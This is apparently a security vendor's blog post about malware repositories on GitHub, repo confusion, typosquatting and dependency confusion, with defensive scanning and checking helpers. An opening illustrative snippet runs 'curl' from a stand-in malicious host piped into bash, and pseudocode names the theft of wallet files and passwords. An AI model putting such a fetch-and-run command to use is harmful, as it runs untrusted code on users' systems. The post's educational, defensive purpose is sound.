GitHub “besieged” by malware repositories and repo confusion: Why you'll be ok

March 12, 2024

As open source software development continues to evolve, so does its susceptibility to cybersecurity threats. One such instance is the recent discovery of malware repositories on GitHub. In this cybersecurity attack, threat actors managed to upload malicious code onto GitHub, a platform that hosts millions of code repositories and is used by developers worldwide.

These GitHub malware repositories are a threat not just to individual developers but also to organizations at large. When the malicious repositories are cloned, or their code is incorporated into other projects, the malware can spread, leading to potential data breaches or system compromises. We’ve covered related threats like typosquatting and dependency confusion in previous Snyk blogs, and by following generally accepted best practices, you can avoid these kinds of dangers. We’ve reiterated those best practices below, along with some Snyk tools like Snyk Advisor and Snyk Learn, before diving deeper into this specific GitHub attack. It is worth noting that this type of attack is not necessarily limited to GitHub: any source code hosting platform where code can be openly shared and copied could host this kind of malicious code.

# Example of a potentially harmful code snippet in a repository
import os

def malicious_function():
    # Downloads a remote shell script and pipes it straight into bash
    os.system('curl https://malicious-website.com/malware_script.sh | bash')

The above hypothetical Python function, when executed, can run a shell command to download and execute a malicious script from an external server. This underlines the importance of scrutinizing code from external repositories.
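One lightweight way to put that scrutiny into practice is to search a freshly cloned repository for patterns like the one above before running anything. The sketch below is a hypothetical helper (`find_suspicious_lines`, `scan_repository`, and the `SUSPICIOUS_PATTERNS` table are illustrative names, and the pattern list is far from exhaustive). It is a first-pass filter that points reviewers at lines worth reading, not a substitute for code review or a real malware scanner.

```python
import re
from pathlib import Path

# Illustrative patterns only; real malware is often obfuscated to evade exactly this kind of check.
SUSPICIOUS_PATTERNS = {
    "pipe-to-shell": re.compile(r"(curl|wget)\s[^|\n]*\|\s*(ba|z)?sh\b"),
    "shell-exec": re.compile(r"\bos\.system\(|\bsubprocess\.(Popen|run|call)\("),
    "dynamic-exec": re.compile(r"\b(exec|eval)\(\s*(base64|codecs|zlib)\."),
}

def find_suspicious_lines(text):
    """Return (line_number, pattern_name, stripped_line) for every line matching a pattern."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(line):
                hits.append((lineno, name, line.strip()))
    return hits

def scan_repository(root, suffixes=(".py", ".sh", ".js")):
    """Scan source files under root (a local clone) and map each file path to its hits."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in suffixes:
            hits = find_suspicious_lines(path.read_text(errors="ignore"))
            if hits:
                results[str(path)] = hits
    return results
```

Running `scan_repository("path/to/clone")` before installing dependencies or executing scripts yields a short list of lines to inspect first; an empty result does not mean the repository is safe.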

Protecting yourself and your team from malware on GitHub: Best practices and security hygiene

In an era where open source software development is the norm and GitHub repositories serve as a gold mine of reusable code, ensuring the security hygiene of the code we consume becomes increasingly crucial. This section covers the importance of vetting code repositories, verifying that a repository is authentic, the perils of cloning malicious repositories, and guidelines for security teams preparing their developers.

Vetting code repositories

In software development, vetting code repositories is a crucial step that should not be underestimated. By thoroughly vetting repositories, developers can avoid integrating malicious code into their projects. GitHub, for instance, hosts a vast number of repositories, and it's not uncommon to find malware there disguised as useful code.

It's essential to review the code thoroughly before incorporating it into your project. This includes checking the repository's history, contributors, and existing issues. Repositories with a single contributor, short history, or unresolved security issues should be treated with caution.
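Part of that check can be automated. The sketch below assumes GitHub's public REST endpoints `GET /repos/{owner}/{repo}` (which returns fields such as `created_at` and `fork`) and `GET /repos/{owner}/{repo}/contributors`; the helper names and the `MIN_AGE_DAYS` threshold are hypothetical. Unauthenticated requests are rate-limited, and the contributors call returns only the first page, which is enough to tell one contributor from several. Reading open issues for unresolved security reports is left to a human.

```python
import json
import urllib.request
from datetime import datetime, timezone

API = "https://api.github.com"
MIN_AGE_DAYS = 90  # hypothetical threshold for a "short history"

def fetch_json(url):
    """GET a GitHub REST API URL and decode the JSON body (unauthenticated, so rate-limited)."""
    req = urllib.request.Request(url, headers={"Accept": "application/vnd.github+json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)

def repo_red_flags(repo, contributors, now=None):
    """Return human-readable warnings derived from repository metadata and contributors."""
    now = now or datetime.now(timezone.utc)
    flags = []
    created = datetime.fromisoformat(repo["created_at"].replace("Z", "+00:00"))
    age_days = (now - created).days
    if age_days < MIN_AGE_DAYS:
        flags.append(f"repository is only {age_days} days old")
    if len(contributors) <= 1:
        flags.append("single contributor")
    if repo.get("fork"):
        flags.append("repository is a fork; compare it with its upstream")
    return flags

def check_repo(owner, name):
    """Fetch metadata for owner/name from the GitHub API and return its red flags."""
    repo = fetch_json(f"{API}/repos/{owner}/{name}")
    contributors = fetch_json(f"{API}/repos/{owner}/{name}/contributors")
    return repo_red_flags(repo, contributors)
```

Note that a repository that was cloned and re-uploaded, rather than forked through GitHub, reports `fork` as false, so the age and contributor checks carry more weight for attacks like the one described below.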

For vetting open source libraries and packages on npm, PyPI, RubyGems, and other package registries, we highly recommend that developers use the Snyk Advisor web tool, which provides a health score for open source packages and libraries, including their security posture, maintenance status, and licensing.

The Snyk Advisor tool providing developers with a package health score for the keras Python package on PyPI.

Guidelines for security teams to prepare their developer teams

Security teams play a pivotal role in ensuring the safety of the development environment. Here are some guidelines for security teams:

Educate developers: Conduct regular workshops or training sessions on the importance of code vetting, repository legitimacy checks, and open source supply chain security attacks such as typosquatting and dependency confusion.
Implement security tools: Use security tools that can automatically scan repositories for known vulnerabilities or suspicious activity.
Establish secure coding practices: Promote secure coding practices within the team. This could involve peer code reviews, using linters with security rules, and regular audits.
Incident response plan: Have an incident response plan in place in case a malicious repository leads to a security breach.

By following these best practices and maintaining good security hygiene, you can safeguard your software development process from threats lurking in GitHub repositories.

Understanding repo confusion

"Repo confusion" refers to a strategy attackers use in this context: creating repositories with names similar to those of existing, legitimate projects. The aim is to trick developers into using the wrong repository so that they inadvertently download and execute the malicious code.

For example, if there is a popular repository named legitimate_repo, an attacker might create a repository named legitimate-repo or legitimate_repo1. Unsuspecting developers might mistake one of these for the original and clone it, not knowing they are falling into a trap. Another common variation, seen in the GitHub malware repository incidents, is for attackers to take a forked copy of a popular repository and push it as a new repository.
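Lookalikes of this kind often differ from the original only in separators, letter case, or a trailing number. The sketch below, with hypothetical helper names, normalizes names by lowercasing, dropping `-`, `_` and `.`, and stripping trailing digits, then treats two different names that normalize to the same string as suspicious. It is deliberately crude: legitimate pairs such as a project and its versioned successor (`lib` and `lib2`) will also be flagged.

```python
import re

def normalize_repo_name(name):
    """Reduce a repository name to a canonical form for lookalike comparison.

    Lowercases, drops '-', '_' and '.', and strips trailing digits, so that
    'legitimate-repo', 'Legitimate_Repo' and 'legitimate_repo1' all collapse
    to 'legitimaterepo'.
    """
    canonical = re.sub(r"[-_.]", "", name.lower())
    return re.sub(r"\d+$", "", canonical)

def is_lookalike(candidate, known):
    """True if candidate differs from known but normalizes to the same string."""
    return candidate != known and normalize_repo_name(candidate) == normalize_repo_name(known)
```

For instance, `is_lookalike("legitimate_repo1", "legitimate_repo")` is true, while an unrelated name is not flagged.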

Malware attacks, typosquatting, and dependency confusion attacks

Repo confusion is closely related to two other cybersecurity threats: typosquatting and dependency confusion attacks. Typosquatting is the practice of registering domain names that resemble popular ones, or publishing packages to open source registries like npm and PyPI under names that resemble popular packages, in the hope that developers will mistype the URL or package name when installing. On GitHub, this might mean creating a repository whose name is only a character off from a popular one, or one with exactly the same name as a popular repository but under a different account.
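The "same name, different account" variant can be caught by checking a clone URL's owner against the account you expect. In the sketch below, `TRUSTED_OWNERS` is a hypothetical, hand-maintained allowlist (the two entries reflect where those projects are officially hosted), and only `https://github.com/<owner>/<repo>` URLs are handled; SSH-style URLs would need their own parsing.

```python
from urllib.parse import urlparse

# Hypothetical allowlist: repository name -> the account that officially hosts it.
TRUSTED_OWNERS = {
    "react": "facebook",
    "keras": "keras-team",
}

def parse_github_url(url):
    """Split an https://github.com/<owner>/<repo>(.git) URL into (owner, repo)."""
    parsed = urlparse(url)
    if parsed.netloc.lower() != "github.com":
        raise ValueError(f"not a github.com URL: {url}")
    parts = parsed.path.strip("/").split("/")
    if len(parts) < 2:
        raise ValueError(f"missing owner or repository in: {url}")
    owner, repo = parts[0], parts[1]
    if repo.endswith(".git"):
        repo = repo[: -len(".git")]
    return owner, repo

def check_owner(url):
    """Return a warning if a known repository name is hosted under an unexpected account."""
    owner, repo = parse_github_url(url)
    expected = TRUSTED_OWNERS.get(repo.lower())
    if expected and owner.lower() != expected:
        return f"'{repo}' is expected under '{expected}', not '{owner}'"
    return None
```

Repositories missing from the allowlist return `None`, so this only helps for projects you have explicitly pinned to an owner.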

Dependency confusion attacks, on the other hand, exploit the way package managers resolve dependencies. If a software project depends on a package that is available only from a private registry, an attacker can publish a package with the same name to the public registry. Depending on how it is configured, the package manager might then download the attacker's public package instead of the legitimate private one, for example because the public copy carries a higher version number.

Example of a potentially dangerous package.json file:
{
  "name": "legitimate-package",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "start": "node index.js"
  },
  "dependencies": {
    "private-package": "^1.0.0"
  }
}

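In the above example, suppose private-package is meant to be installed from an internal registry. If an attacker publishes a malicious package with the same name to the public npm registry, with a version that satisfies ^1.0.0, running npm install in an environment that resolves that name from the public registry could download and install the malicious package instead.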
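One common mitigation is to publish internal packages under an npm scope your organization owns (registering that scope on the public registry too, so nobody else can claim it) and to map the scope to the internal registry in .npmrc with a line such as `@example-corp:registry=https://npm.example-corp.internal/`. The Python sketch below flags internal dependencies in a package.json that are still unscoped and could therefore be registered by anyone on the public registry. The scope `@example-corp`, the registry URL, and the inventory of internal names are all hypothetical.

```python
import json

ORG_SCOPE = "@example-corp/"  # hypothetical npm scope owned by your organization

def unscoped_internal_deps(package_json_text, internal_names):
    """List dependencies known to be internal that are not under ORG_SCOPE.

    Unscoped internal names are the ones an attacker could publish on the public
    registry. internal_names is an inventory you maintain yourself (hypothetical).
    """
    manifest = json.loads(package_json_text)
    deps = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        deps.update(manifest.get(section, {}))
    return sorted(
        name for name in deps
        if name in internal_names and not name.startswith(ORG_SCOPE)
    )
```

Run against the package.json above with `{"private-package"}` as the inventory, it reports `["private-package"]`, signalling that the dependency should be moved under the organization's scope.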

The GitHub malware repositories attack, coupled with repo confusion, typosquatting, and dependency confusion attacks, poses a serious threat to the security of open source software development. It underscores the need for developers to exercise caution when using third-party code and to adopt robust cybersecurity measures.

Understanding the GitHub malware repositories attack

What happened in the GitHub malicious repositories attack? Let's explore the specifics of this incident, in which GitHub repositories were used to infiltrate software developers' workstations. We will examine how the attack took place, the tactics the attackers employed, and the potential harm caused.

The first recorded instance of this attack was traced back to February 28th, 2024. In a seemingly innocuous event, an anonymous user forked a popular open source repository and pushed it as a new repository. However, it was soon revealed that the newly pushed repo was not as harmless as it first appeared.

The perpetrators had embedded obfuscated malware within the codebase, effectively turning the repository into a minefield of malicious code. Unsuspecting developers who cloned these repositories and ran their code unknowingly introduced the malware into their local systems.

Attackers' method: Forking and pushing malware-infused code repositories

The attackers used a clever and subtle technique. They forked existing open source code repositories, which is a common practice among developers intending to contribute to an open source project. However, the attackers then added obfuscated malicious code into these repositories.

Following is an example of cloning an existing repository so that it can be republished as a new one:

git clone https://github.com/original/repo.git
cd repo
git remote rename origin upstream

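After the steps illustrated above, the attacker would add the malicious code, point a new origin remote at a repository under their own account (attacker below is a placeholder account name), and push the result to GitHub:

git remote add origin https://github.com/attacker/repo.git
git add .
git commit -m "Add new feature"
git push origin master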

The obfuscated malware was designed to be difficult to spot during a traditional code review. By the time the malicious code was discovered, it had already infected a number of developer systems.
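Obfuscated payloads frequently appear as long encoded string literals, which is one reason automated heuristics can complement human review. A common heuristic is Shannon entropy: base64-like blobs score close to 6 bits per character, while ordinary identifiers and prose score noticeably lower. The sketch below applies that idea line by line; the helper names and both thresholds are hypothetical and would need tuning. It will miss payloads split across many short strings and will flag legitimate blobs such as embedded hashes or images.

```python
import math
import re
from collections import Counter

# Hypothetical thresholds; tune them against your own codebase before relying on them.
MIN_LENGTH = 100
ENTROPY_THRESHOLD = 4.5  # bits per character

# A quote, at least MIN_LENGTH characters that are not that quote, then the same quote.
STRING_LITERAL = re.compile(r"""(['"])((?:(?!\1).){%d,})\1""" % MIN_LENGTH)

def shannon_entropy(s):
    """Shannon entropy of s in bits per character."""
    if not s:
        return 0.0
    counts = Counter(s)
    total = len(s)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

def flag_encoded_blobs(source):
    """Return (line_number, entropy) for long, high-entropy string literals in source."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in STRING_LITERAL.finditer(line):
            entropy = shannon_entropy(match.group(2))
            if entropy >= ENTROPY_THRESHOLD:
                findings.append((lineno, round(entropy, 2)))
    return findings
```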

Potential harm: Stealing cryptocurrency and passwords

The main objective of the embedded malware was to steal sensitive information from the infected devices. Specifically, the malware targeted cryptocurrency wallets and passwords stored on the developers' systems.

Once on a system, the malware would look for files related to cryptocurrency wallets, such as Bitcoin and Ethereum wallets, and transmit them back to the attacker. It would also attempt to steal passwords stored in plaintext or in weakly encrypted formats.

Following is a simplified pseudocode representation of the malware's objectives:

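def infiltrate_system():
    # Overall goal: exfiltrate wallet files, then stored passwords
    steal_files('*.wallet')
    steal_passwords()

def steal_files(file_pattern):
    """Find files matching file_pattern (e.g. wallet files) and transmit them (details omitted)."""

def steal_passwords():
    """Find stored passwords and transmit them (details omitted)."""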

The above pseudocode gives a simplified idea of what the malware might do once it has infiltrated a system.

The GitHub malware repositories attack serves as a stark reminder of the importance of stringent security measures in software development and the potential dangers lurking in the open source landscape. As developers and security professionals, we need to stay vigilant and use best practices to prevent such attacks.

Typosquatting and dependency confusion attacks: A close relative

The GitHub malware attacks have two close relatives among common and dangerous cybersecurity threats: typosquatting and dependency confusion attacks. To understand the connection and the potential risk these attacks pose, we'll begin by defining both concepts and then examine some real-world instances where they were successfully executed.

Definition of typosquatting and dependency confusion attacks

Typosquatting, in the context of code repositories and open source software, is a form of cybersecurity attack that targets developers who mistype a library name when installing packages, for example by running npm install riact-dom instead of npm install react-dom. The attackers create malicious packages with names similar to popular ones and wait for developers to make typos. Once developers install these malicious packages, the attackers can steal sensitive information or inject malware into the developer's system.
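A simple defense is to compare a requested package name against a list of popular names and warn when it is only a character or two away. The sketch below uses Levenshtein edit distance (minimum single-character insertions, deletions, and substitutions). The `POPULAR_PACKAGES` list and helper names are hypothetical; in practice you might seed the list with a registry's most-downloaded packages. The default `max_distance=1` keeps false positives down, since many legitimate short names sit within two edits of each other.

```python
# Hypothetical list; in practice, seed it with a registry's most-downloaded packages.
POPULAR_PACKAGES = ["react", "react-dom", "lodash", "express", "requests", "numpy"]

def edit_distance(a, b):
    """Levenshtein distance between a and b, computed with two rolling rows."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        current = [i]
        for j, cb in enumerate(b, start=1):
            current.append(min(
                previous[j] + 1,               # delete ca
                current[j - 1] + 1,            # insert cb
                previous[j - 1] + (ca != cb),  # substitute (free if equal)
            ))
        previous = current
    return previous[-1]

def possible_typosquat(name, popular=POPULAR_PACKAGES, max_distance=1):
    """Return popular names within max_distance edits of name, excluding an exact match."""
    return [p for p in popular if p != name and edit_distance(name, p) <= max_distance]
```

With this list, `possible_typosquat("riact-dom")` returns `["react-dom"]`, while the correctly spelled `react-dom` produces no warning.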

A dependency confusion attack, by contrast, is a type of supply chain attack that targets open source software development processes. In this attack, a hacker creates a malicious package with the same name as a private package used in a project's development environment. When the project's build system fetches dependencies, it mistakenly picks up the malicious public package, thinking it's the private one. This allows malicious code to enter and infect the project's codebase.

# Malicious package with same name as private package
# This is a Python example, but the attack extends to other languages (Node.js, Ruby, etc.)
def malicious_function():
    """Could do anything once installed: steal data, corrupt files, etc. (body omitted)."""
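Why would a build system prefer the public package? One common cause is a resolver that is given several indexes and treats them as equals, installing the highest version that satisfies an unpinned requirement (pip behaves this way when a second index is added with `--extra-index-url`). The toy resolver below models only that behavior and ignores version ranges and pre-releases; it is a simplified, hypothetical model rather than how any particular tool is implemented, and the index contents are made up. The second function shows the fix in miniature: internal names may only resolve from the private index.

```python
# Made-up index contents: package name -> available versions.
PRIVATE_INDEX = {"private-package": ["1.0.0", "1.2.0"]}
PUBLIC_INDEX = {"private-package": ["99.0.0"], "requests": ["2.31.0"]}  # 99.0.0 is the attacker's upload

def parse_version(v):
    """Turn 'X.Y.Z' into a comparable tuple of ints (no pre-release handling)."""
    return tuple(int(part) for part in v.split("."))

def resolve_merged(name, indexes):
    """Naive resolver: pool every index and pick the highest version (vulnerable)."""
    candidates = [(parse_version(v), label, v)
                  for label, index in indexes
                  for v in index.get(name, [])]
    if not candidates:
        raise LookupError(name)
    _, label, version = max(candidates)
    return label, version

def resolve_pinned(name, indexes, internal_names):
    """Safer variant: names known to be internal may only come from the private index."""
    if name in internal_names:
        indexes = [(label, index) for label, index in indexes if label == "private"]
    return resolve_merged(name, indexes)

INDEXES = [("private", PRIVATE_INDEX), ("public", PUBLIC_INDEX)]
```

`resolve_merged("private-package", INDEXES)` picks the attacker's `99.0.0` from the public index, whereas `resolve_pinned` with `{"private-package"}` as the internal set returns the private `1.2.0` and still lets ordinary public packages resolve normally.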

Real-life examples of typosquatting and dependency confusion attacks

One of the most prominent examples of typosquatting was the attack on the official Python package repository, PyPI, in 2017. Attackers uploaded malicious packages with names very similar to popular ones, affecting thousands of users who accidentally installed these packages.

A well-known demonstration of dependency confusion came from security researcher Alex Birsan in 2021. He showed that the technique worked against various high-profile companies, including Apple, Microsoft, and PayPal, by getting his own code to run inside their internal systems. He published packages with the same names as private packages these companies were using to public package repositories. When the companies' build systems fetched dependencies, they inadvertently installed Birsan's packages instead, allowing his proof-of-concept code to run within their systems.

In short, both typosquatting and dependency confusion attacks pose a significant threat to open source software development. It's crucial for developers and organizations to be aware of these attack vectors and implement appropriate measures to safeguard their systems and codebases.

Conclusion

To summarize, we've explored the issue of malware repositories on GitHub and how they can exploit common vulnerabilities in open source security. Specifically, we discussed how these repositories can leverage tactics like typosquatting and dependency confusion attacks to infiltrate unsuspecting systems.

As developers and security professionals, we are the first line of defense against these kinds of cybersecurity threats. It's crucial that we adhere to best practices and maintain good security hygiene to protect our code and systems.

Implementing a few key strategies can go a long way in protecting against these threats:

Always verify the integrity of repositories and packages before using them. This can be as simple as checking the username of the repository owner or as complex as verifying the cryptographic signatures of packages.
Watch out for typographical errors when cloning repositories or installing packages.
Use private package feeds for internal packages, and configure your tooling so that internal package names can only be resolved from those feeds, to reduce the risk of dependency confusion attacks.
Regularly update and patch your systems to protect against known vulnerabilities.
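For the first point, one concrete form of integrity checking is comparing a downloaded artifact against a recorded hash. npm's package-lock.json, for instance, stores an `integrity` field in Subresource Integrity form (`sha512-` followed by a base64-encoded digest). The sketch below, with hypothetical helper names, computes and checks such a string. It handles a single hash per string, and it only confirms that the bytes are unchanged since the hash was recorded, not that the publisher is trustworthy; cryptographic signature verification is the stronger, separate step.

```python
import base64
import hashlib
import hmac

def sri_digest(data, algorithm="sha512"):
    """Compute a Subresource Integrity string such as 'sha512-<base64>' for data."""
    digest = hashlib.new(algorithm, data).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"

def verify_integrity(data, expected):
    """Check data against an expected 'algo-base64' string, e.g. from package-lock.json."""
    algorithm, _, _ = expected.partition("-")
    if algorithm not in ("sha256", "sha384", "sha512"):
        raise ValueError(f"unsupported algorithm: {algorithm}")
    # Constant-time comparison of the two ASCII strings
    return hmac.compare_digest(sri_digest(data, algorithm), expected)
```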